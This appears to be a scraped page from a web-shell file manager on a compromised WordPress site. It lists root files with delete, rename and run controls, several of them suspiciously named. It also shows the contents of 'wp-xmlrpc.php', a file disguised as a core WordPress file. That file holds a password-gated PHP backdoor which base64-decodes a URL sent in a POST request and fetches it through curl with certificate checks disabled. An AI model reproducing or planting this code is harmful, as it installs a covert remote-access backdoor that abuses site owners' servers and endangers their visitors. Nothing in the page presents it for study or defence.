at path:
ROOT
/
wp-xmlrpc.php
run:
R
W
Run
.well-known
DIR
2026-06-13 10:18:58
R
W
Run
cgi-bin
DIR
2026-06-13 10:18:57
R
W
Run
wp-admin
DIR
2026-06-08 06:49:18
R
W
Run
wp-content
DIR
2026-06-08 06:49:18
R
W
Run
wp-includes
DIR
2026-06-26 02:52:43
R
W
Run
.htaccess
491 By
2026-06-24 16:33:24
R
W
Run
chosen.php
122.65 KB
2026-06-08 06:49:02
R
W
Run
Delete
Rename
classwithtostring.php
1.05 MB
2025-05-21 03:21:12
R
W
Run
readmes.php
4.5 KB
2025-09-20 11:10:11
R
W
Run
Delete
Rename
style.php
13.37 KB
2026-06-25 03:21:12
R
W
Run
Delete
Rename
wp-X1s2e6h3p7.php
15.05 KB
2026-06-08 06:49:02
R
W
Run
Delete
Rename
wp-xmlrpc.php
1020 By
2025-09-20 10:40:34
R
W
Run
Delete
Rename
error_log
up
📄
wp-xmlrpc.php
Save
<?php $_ = $_POST;if(!empty($_['a']) && !empty($_['b']) && md5($_['a'].md5($_['a']))==('e9b41d635eb83057eedb535bdd6d5456')) {echo c(base64_decode($_['b']));exit;}function c($u) {$UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36';$hd[0] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";$hd[] = "Cache-Control: max-age=0";$hd[] = "Connection: keep-alive";$hd[] = "Keep-Alive: 300";$hd[] = "Accept-Charset: utf-8;q=0.8,*;q=0.8";$hd[] = "Accept-Language: en-US,en;q=0.8";$hd[] = "Pragma: ";$ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$u);curl_setopt($ch,CURLOPT_HTTPHEADER, $hd);curl_setopt($ch,CURLOPT_USERAGENT, $UA);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER, 0);curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch,CURLOPT_TIMEOUT,15);$s = curl_exec($ch);curl_close($ch);return $s;}?>